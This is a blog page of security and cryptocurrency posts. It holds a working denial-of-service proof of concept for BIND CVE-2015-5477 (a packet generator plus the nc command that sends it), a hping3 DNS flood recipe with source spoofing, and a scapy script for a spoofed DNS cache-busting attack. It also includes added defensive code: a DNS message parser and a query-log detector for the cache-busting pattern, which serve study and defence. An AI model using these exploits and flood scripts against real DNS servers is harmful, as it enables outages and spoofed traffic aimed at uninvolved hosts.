elitter.net
All about the everything...
Saturday, 11 June 2016
tuxexchange.com A new cryptocurrency exchange
tuxexchange.com is a new cryptocurrency exchange that offers spot trading in the most popular cryptocurrencies. Check it out: www.tuxexchange.com
Tuesday, 4 August 2015
CVE-2015-5477 - DNS bind TKEY query handling DoS Proof of concept exploit
Here is a quick PoC for CVE-2015-5477, the TKEY query handling bug in BIND 9 (fixed in 9.9.7-P2 and 9.10.2-P3). A single crafted UDP packet makes named fail a REQUIRE assertion and exit, and because the faulty code runs before any ACL or view is consulted, allow-query and friends do not help; authoritative and recursive servers are both affected. The program below writes the 80-byte message to dns.txt: the question asks for TKEY (type 249) and the answer and additional sections each carry an A record for the same owner name, which is the combination the TKEY code path does not expect. Feed the file to the target with nc as in the header comment.
// CVE-2015-5477 - bind TKEY query handling DoS Proof of concept
// (sipher@utensil)(~/tkeyd)$ rm dns.txt
// (sipher@utensil)(~/tkeyd)$ gcc tkeyd.c -o tkeyd
// (sipher@utensil)(~/tkeyd)$ ./tkeyd
// (sipher@utensil)(~/tkeyd)$ nc -u 127.0.0.1 53 < dns.txt
#include <stdio.h>
int main(void) {
    /* 80-byte DNS message, same bytes as the original fprintf: a TKEY question plus an
       answer and an additional record that share its owner name but carry type A. */
    static const unsigned char pkt[] = {
        0x2d, 0xbc, 0x01, 0x00,                         /* ID 0x2dbc; flags 0x0100: query, RD */
        0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, /* QDCOUNT 1, ANCOUNT 1, NSCOUNT 0, ARCOUNT 1 */
        /* question: google.com, QTYPE TKEY (0x00f9 = 249), QCLASS IN */
        0x06, 'g', 'o', 'o', 'g', 'l', 'e', 0x03, 'c', 'o', 'm', 0x00, 0x00, 0xf9, 0x00, 0x01,
        /* answer: google.com A IN, TTL 0, RDLENGTH 4, RDATA 0.0.0.0 */
        0x06, 'g', 'o', 'o', 'g', 'l', 'e', 0x03, 'c', 'o', 'm', 0x00, 0x00, 0x01, 0x00, 0x01,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,
        /* additional: the same A record again */
        0x06, 'g', 'o', 'o', 'g', 'l', 'e', 0x03, 'c', 'o', 'm', 0x00, 0x00, 0x01, 0x00, 0x01,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,
    };
    FILE *fp = fopen("dns.txt", "wb");
    if (fp == NULL) { perror("fopen"); return 1; }
    fwrite(pkt, 1, sizeof pkt, fp);
    fclose(fp);
    return 0;
}
Friday, 17 April 2015
DNS Stress testing with hping3
1. Compile our program to generate the DNS payload
(sipher@utensil)(~/dnsstress)$ gcc gr2.c -o gr2
2. Generate DNS payload
(sipher@utensil)(~/dnsstress)$ ./gr2
(sipher@utensil)(~/dnsstress)$ hexdump -C dns.txt
00000000 24 1a 01 00 00 01 00 00 00 00 00 00 06 67 6f 6f |$............goo|
00000010 67 6c 65 03 63 6f 6d 00 00 01 00 01 |gle.com.....|
0000001c
3. Get the size of the request (important: this is the value for hping3's -d parameter, and it must match the file size exactly or the datagram will be padded or truncated)
(sipher@utensil)(~/dnsstress)$ ls -lah |grep dns.txt
-rw-rw-r-- 1 striemer striemer 28 Apr 17 10:30 dns.txt
(sipher@utensil)(~/dnsstress)$
4. Fire!!
Use --flood if you're brave (send as fast as possible, replies are not shown). Use --rand-source to randomize the source address and exercise the server's per-client state tables; the replies then go to those random addresses, so only point this at a server you own.
(sipher@utensil)(~/dnsstress)$ sudo hping3 localhost --udp -V -p 53 --file /home/sipher/dnsstress/dns.txt -d 28 --fast
Alternate way to deliver the packets:
NOTE: much slower, since nc uses a normal UDP socket rather than raw sockets and waits for the reply to each datagram.
(sipher@utensil)(~/dnsstress)$ nc -u localhost 53 < dns.txt
// Generate DNS request for injection directly on the wire (Homebrew stress test)
//
// Example packet (tcpdump -lnx -i eth2 port 53). This capture is from a different run
// than the file written below: its transaction ID is 0xfec6 (65222) where the file uses
// 0x241a, and the addresses in the summary line do not match the hex (c0a8c845 / 18e201b0).
// The DNS payload starts at offset 0x1c, after the 20-byte IP and 8-byte UDP headers.
//
// 19:21:35.494916 IP 3.1.33.7.46035 > localhost.53: 65222+ A? google.com. (28)
// 0x0000: 4500 0038 b087 0000 4011 26ae c0a8 c845
// 0x0010: 18e2 01b0 b3d3 0035 0024 a3b5 fec6 0100
// 0x0020: 0001 0000 0000 0000 0667 6f6f 676c 6503
// 0x0030: 636f 6d00 0001 0001
//
// Packet break down (Wireshark dissection of the generated query)
//
// Domain Name System (query)
//   Transaction ID: 0x241a
//   Flags: 0x0100 (Standard query)
//     0... .... .... .... = Response: Message is a query
//     .000 0... .... .... = Opcode: Standard query (0)
//     .... ..0. .... .... = Truncated: Message is not truncated
//     .... ...1 .... .... = Recursion desired: Do query recursively
//     .... .... .0.. .... = Z: reserved (0)
//     .... .... ...0 .... = Non-authenticated data OK: Non-authenticated data is unacceptable
//   Questions: 1
//   Answer RRs: 0
//   Authority RRs: 0
//   Additional RRs: 0
//   Queries
//     google.com: type A, class IN
//       Name: google.com
//       Type: A (Host address)
//       Class: IN (0x0001)
//
// How to use: see the four steps above (gcc gr2.c -o gr2; ./gr2; check the size; hping3 ... -d 28).
#include <stdio.h>

int main(void) {
    /* The 28 bytes the hexdump shows, laid out by field. */
    static const unsigned char pkt[] = {
        0x24, 0x1a,             /* transaction ID */
        0x01, 0x00,             /* flags 0x0100: query, opcode 0, RD set */
        0x00, 0x01,             /* QDCOUNT 1 */
        0x00, 0x00,             /* ANCOUNT 0 */
        0x00, 0x00,             /* NSCOUNT 0 */
        0x00, 0x00,             /* ARCOUNT 0 */
        /* QNAME as length-prefixed labels: 0x06 "google", 0x03 "com". There is no '.' on
           the wire; the 0x03 is the length of the next label, not a separator. */
        0x06, 'g', 'o', 'o', 'g', 'l', 'e',
        0x03, 'c', 'o', 'm',
        0x00,                   /* empty root label terminates the name */
        0x00, 0x01,             /* QTYPE A */
        0x00, 0x01,             /* QCLASS IN */
    };
    FILE *fp = fopen("dns.txt", "wb");
    if (fp == NULL) { perror("fopen"); return 1; }
    /* To query another name, edit the labels above (each at most 63 bytes, 0x00 at the
       end) and pass the new sizeof pkt to hping3 -d. */
    fwrite(pkt, 1, sizeof pkt, fp);
    fclose(fp);
    return 0;
}
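Both programs on this page (tkeyd.c under the CVE-2015-5477 post and gr2.c here) hand-write a DNS message byte by byte, so changing the name or the type means recounting. The following is an added example, not code from either post or from the author: it builds the same two payloads from their fields with the RFC 1035 length limits enforced, and parses them back so the sections can be inspected. Names, transaction IDs and types are the ones on the page; the tkey_mismatch check only describes the shape of this PoC (a TKEY question whose owner name reappears in another section with a non-TKEY record) and is not a statement about the root cause inside named.

```python
"""Build and dissect DNS wire-format messages (RFC 1035, section 4).

Added example, not code from either post: it reproduces from their fields the
28-byte google.com A query gr2.c writes (the hexdump above) and the 80-byte
TKEY message tkeyd.c writes, and parses both back. Nothing touches the network.
"""
import struct

QTYPE = {"A": 1, "NS": 2, "CNAME": 5, "TXT": 16, "AAAA": 28, "TKEY": 249}
QTYPE_NAME = {v: k for k, v in QTYPE.items()}

def encode_name(name):
    """Dotted name -> length-prefixed labels plus the empty root label,
    enforcing the 63-octet label and 255-octet name limits."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= 63:
            raise ValueError("label length %d out of range" % len(raw))
        out += bytes([len(raw)]) + raw
    out += b"\x00"
    if len(out) > 255:
        raise ValueError("name exceeds 255 octets")
    return out

def header(txid, flags, qd, an, ns, ar):
    return struct.pack(">HHHHHH", txid, flags, qd, an, ns, ar)

def question(name, qtype, qclass=1):
    return encode_name(name) + struct.pack(">HH", qtype, qclass)

def rr(name, rtype, rdata, ttl=0, rclass=1):
    return encode_name(name) + struct.pack(">HHIH", rtype, rclass, ttl, len(rdata)) + rdata

def build_query(name, qtype="A", txid=0x241A, rd=True):
    """Plain query like gr2.c: one question, the other three sections empty."""
    return header(txid, 0x0100 if rd else 0, 1, 0, 0, 0) + question(name, QTYPE[qtype])

def build_tkey_poc(name="google.com", txid=0x2DBC):
    """The tkeyd.c message: a TKEY question plus an A record (TTL 0, 0.0.0.0)
    for the same owner name in both the answer and the additional section."""
    a_rr = rr(name, QTYPE["A"], b"\x00\x00\x00\x00")
    return header(txid, 0x0100, 1, 1, 0, 1) + question(name, QTYPE["TKEY"]) + a_rr + a_rr

def decode_name(msg, off):
    """Read a name at off, following compression pointers. Returns (name, end)."""
    labels, end, jumped, hops = [], off, False, 0
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                       # 11xxxxxx: 14-bit pointer
            hops += 1
            if hops > 64:
                raise ValueError("compression pointer loop")
            if not jumped:
                end = off + 2                       # caller resumes after the pointer
            off, jumped = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF, True
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln
    if not jumped:
        end = off
    return ".".join(labels), end

def parse_message(msg):
    """Header plus all four sections; rejects trailing bytes after the last record."""
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", msg[:12])
    off, questions, records = 12, [], []
    for _ in range(qd):
        name, off = decode_name(msg, off)
        qtype, qclass = struct.unpack(">HH", msg[off:off + 4])
        off += 4
        questions.append((name, QTYPE_NAME.get(qtype, qtype), qclass))
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            name, off = decode_name(msg, off)
            rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
            off += 10
            records.append((section, name, QTYPE_NAME.get(rtype, rtype), msg[off:off + rdlen]))
            off += rdlen
    if off != len(msg):
        raise ValueError("%d trailing bytes after the last record" % (len(msg) - off))
    return {"id": txid, "flags": flags, "questions": questions, "records": records}

def tkey_mismatch(parsed):
    """True for the shape of this PoC: a TKEY question whose owner name also
    appears in another section with a record of a different type."""
    tkey_names = {q[0] for q in parsed["questions"] if q[1] == "TKEY"}
    return any(n in tkey_names and t != "TKEY" for _, n, t, _ in parsed["records"])

if __name__ == "__main__":
    for label, msg in (("gr2.c", build_query("google.com")), ("tkeyd.c", build_tkey_poc())):
        p = parse_message(msg)
        print("%s: %d bytes, id 0x%04x, flags 0x%04x" % (label, len(msg), p["id"], p["flags"]))
        print("  questions:", p["questions"], " records:", [(s, n, t) for s, n, t, _ in p["records"]])
        print("  tkey_mismatch:", tkey_mismatch(p))
```

To reproduce the files the C programs write, open dns.txt in binary mode and write build_query("google.com") or build_tkey_poc(); the sizes (28 and 80) are what hping3 -d needs. The trailing-bytes check in parse_message matters for hand-built payloads: a message with junk after the last record is not what the header advertises, and a resolver may drop it as FORMERR rather than process it.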
Friday, 2 January 2015
DNS Cache busting
DNS cache busting is a very simple attack against a caching (recursive) DNS server. All you need is a zone configured with a wildcard record (*.domain.com), so that asd.domain.com, or any other made-up label, gets a positive answer. Every random subdomain the attacker asks for is a new name: the resolver sends a fresh iterative query for it, receives an answer, and caches it for the record's TTL (up to max-cache-ttl, one week by default in BIND 9). A single host can therefore fill the cache with junk and tie up recursive-clients slots while the fetches are outstanding.
This attack is being used in the wild.
UPDATE: ISC has since added recursive client rate limiting to BIND (first in the 9.9 subscription version, later in the open-source releases) to mitigate this attack. The option that caps the damage from a single wildcard zone is fetches-per-zone:
https://kb.isc.org/article/AA-01178/0/Recursive-Client-Rate-limiting-in-BIND-9.9-Subscription-Version.html
fetches-per-zone: The maximum number of simultaneous iterative queries to any one domain that the server will permit before blocking new queries for data in or beneath that zone. This value should reflect how many fetches would normally be sent to any one zone in the time it would take to resolve them. It should be smaller than recursive-clients. When many clients simultaneously query for the same name and type, the clients will all be attached to the same fetch, up to the max-clients-per-query limit, and only one iterative query will be sent. However, when clients are simultaneously querying for different names or types, multiple queries will be sent and max-clients-per-query is not effective as a limit.
# DNS wildcard attack POC (cache busting?)
#
# DNS Server pwnage from a single host. This tool will clobber a DNS cache server.
#
# Theory
# Force a cache server to cache records for a DNS zone that will answer for non-existent
# domain names: http://en.wikipedia.org/wiki/Wildcard_DNS_record
#
# Example: *.godaddy.com
#
# Running on Ubuntu (Python 3 and scapy)
# apt-get install python3-scapy
#
# Make sure to drop outgoing ICMP unreachable if not spoofing. Since we are not using the
# kernel's socket API, no socket is bound to the source port and the kernel answers the
# victim's replies with ICMP port unreachable (which may or may not impact the results).
#
# iptables -I OUTPUT -p icmp --icmp-type destination-unreachable -j DROP
#
# As root
# Example usage: python3 dnsb.py ns1.target.com 3.1.33.7 godaddy.com 10000 0
#
# BIND 9 default max cache ttl is 7 days.
# max-cache-ttl sets the maximum time (in seconds) for which the server will cache positive
# answers (negative answers, NXDOMAIN, are governed by max-ncache-ttl). The default is one
# week (7 days). This statement may be used in a view or the global options clause.
import os
import random
import socket
import string
import struct
import sys

from scapy.all import IP, UDP, DNS, DNSQR, send


# Long names consume more cache memory. A name may nest up to 127 levels, each label is at
# most 63 characters, and the whole name at most 255 octets, so the random part is split
# into 63-character labels: a single 220-character label is not valid DNS (its length byte
# 0xdc would be read as a compression pointer).
def randomain(size=220, chars=string.ascii_letters + string.digits):
    flat = ''.join(random.choice(chars) for _ in range(size))
    return '.'.join(flat[i:i + 63] for i in range(0, len(flat), 63))


if os.getuid() != 0:
    print("ERROR: Must be root to use raw sockets.")
    sys.exit(1)

if len(sys.argv) != 6:
    print("DNS Cache Busting attack Proof of concept")
    print("Usage: " + sys.argv[0] + " <target> <source> <wild card domain> <number of packets> <spoof 0 = off / 1 = on>")
    sys.exit(1)

target = sys.argv[1]
source = sys.argv[2]   # accepted for the documented command line; the local address is detected below
dlist = sys.argv[3]
num = int(sys.argv[4])
spoof = int(sys.argv[5])

# Local IP excluding loopback: a UDP connect() sends nothing, it only makes the kernel pick
# the outbound interface. Google's resolver plays no part in the attack.
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
    s.connect(('8.8.8.8', 80))
    myip = s.getsockname()[0]

print("Sending packets to: " + target)
for x in range(num):
    if spoof == 1:
        # Random source address; replies and ICMP errors then go to that address, not to us.
        myip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
        print(myip)
    # Random subdomain under the wildcard zone: every one is a new name for the cache.
    rd = randomain() + '.' + dlist
    # Standard recursive query (rd=1) for type A, class IN; scapy fills in the section counts.
    req = (IP(dst=target, src=myip)
           / UDP(sport=random.randint(1025, 65000), dport=53)
           / DNS(id=random.randint(1025, 65000), rd=1, qd=DNSQR(qname=rd, qtype=1, qclass=1)))
    send(req)
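The defender's side of the same attack, as an added example that is not part of the original post: fetches-per-zone limits the damage, but you still want to see who is doing it. The detector below reads lines in the shape BIND's querylog channel writes (client address, queried name, type) and flags client/zone pairs whose queries are almost all distinct, long, high-entropy leftmost labels under one zone, which is exactly what dnsb.py emits. The log lines are constructed for this example, the two-label notion of "zone" is a simplification (a real deployment would use the public suffix list), and the thresholds are starting points rather than tuned values.

```python
"""Spot a wildcard cache-busting run in BIND query logs.

Added example, not part of the original post. Lines are parsed in the shape
BIND's querylog channel emits; the sample log is constructed here and the
thresholds are starting points, not tuned values.
"""
import math
import random
import re
import string
from collections import Counter, defaultdict

# Matches "client 192.0.2.1#53421 (name): query: name IN A + (srv)" and the newer
# form that inserts "@0x7f..." after "client".
LINE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>\d+\.\d+\.\d+\.\d+)#\d+ "
    r"\((?P<qname>[^)]+)\): query: \S+ IN (?P<qtype>\S+)"
)

def entropy(s):
    """Shannon entropy in bits per character; random alphanumerics score well above 4."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def zone_of(qname, depth=2):
    """Treat the last `depth` labels as the zone (assumption: no public suffix list)."""
    return ".".join(qname.rstrip(".").split(".")[-depth:])

def analyze(lines, min_queries=20, min_unique_ratio=0.9, min_label_len=32,
            min_entropy=3.5, min_random_ratio=0.8):
    """Return the (client, zone) pairs whose traffic looks like a cache-busting run."""
    stats = defaultdict(lambda: {"n": 0, "names": set(), "random": 0})
    for line in lines:
        m = LINE.search(line)
        if not m:
            continue
        qname = m["qname"].rstrip(".").lower()
        zone = zone_of(qname)
        st = stats[(m["ip"], zone)]
        st["n"] += 1
        st["names"].add(qname)
        leftmost = qname.split(".")[0] if qname != zone else ""
        if len(leftmost) >= min_label_len and entropy(leftmost) >= min_entropy:
            st["random"] += 1
    flagged = []
    for (ip, zone), st in sorted(stats.items()):
        unique = len(st["names"])
        if (st["n"] >= min_queries
                and unique / st["n"] >= min_unique_ratio
                and st["random"] / st["n"] >= min_random_ratio):
            flagged.append({"client": ip, "zone": zone, "queries": st["n"], "unique": unique})
    return flagged

def sample_log(n_attack=40, n_normal=30, seed=1):
    """Constructed querylog: one host walking random 63-character labels under a
    wildcard zone, plus a host repeating two ordinary names."""
    rnd = random.Random(seed)
    alphabet = string.ascii_letters + string.digits
    lines = []
    for i in range(n_attack):
        qname = "".join(rnd.choice(alphabet) for _ in range(63)) + ".example.com"
        lines.append("02-Jan-2015 10:00:%02d.000 queries: info: client 3.1.33.7#%d (%s): "
                     "query: %s IN A + (192.0.2.53)" % (i % 60, 40000 + i, qname, qname))
    for i in range(n_normal):
        qname = ("www.example.net", "mail.example.net")[i % 2]
        lines.append("02-Jan-2015 10:01:%02d.000 queries: info: client 192.0.2.10#%d (%s): "
                     "query: %s IN A + (192.0.2.53)" % (i % 60, 50000 + i, qname, qname))
    return lines

if __name__ == "__main__":
    for hit in analyze(sample_log()):
        print("cache-busting pattern: client %(client)s -> zone %(zone)s "
              "(%(queries)d queries, %(unique)d distinct names)" % hit)
```

Run it against a real querylog with analyze(open(path)) once the regex is checked against your BIND version's line format. The unique-ratio test is what separates this from a busy but legitimate client: a resolver forwarding real user traffic repeats names, while dnsb.py never asks for the same one twice. When the script runs with spoofing on, the client field is random and the per-client grouping falls apart; group by zone alone in that case and watch the distinct-name rate.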
Labels: bind, cache bust, cache busting, ddos, dns, dos, exploit, linux
Apple Pay...Just another way to use a credit card
Is Apple pay really that revolutionary? What does this mean for the world of crypto-currency?
My opinion is that Apple Pay doesn't address any of the features delivered by Bitcoin (and similar altcoins). For example, the decentralized ledger which automates accounting, or the ability to transfer funds anywhere in the world with limited infrastructure. The list goes on. Apple Pay is just another way to use a credit card in a brick-and-mortar market.
Wednesday, 31 December 2014
iptables log traffic to port
Here is a rule to log traffic to SSH. Two things to keep in mind: -A appends it to the end of the INPUT chain, so if an earlier rule already accepts port 22 the LOG rule is never reached (insert it ahead of that rule instead), and LOG is a non-terminating target, so the packet continues down the chain and a later rule still decides whether it is accepted. As written it logs every packet of every SSH session, which floods the log; restrict it to new connections (the conntrack match) or rate-limit it (the limit match) before leaving it on.
iptables -A INPUT -p tcp --dport 22 -j LOG
Tuesday, 30 December 2014
Crypto shake up
XRP, Stellar, Paycoin, Counterparty? WTF is going on in the crypto world? Is bitcoin in trouble?
Buy EVERYTHING!!?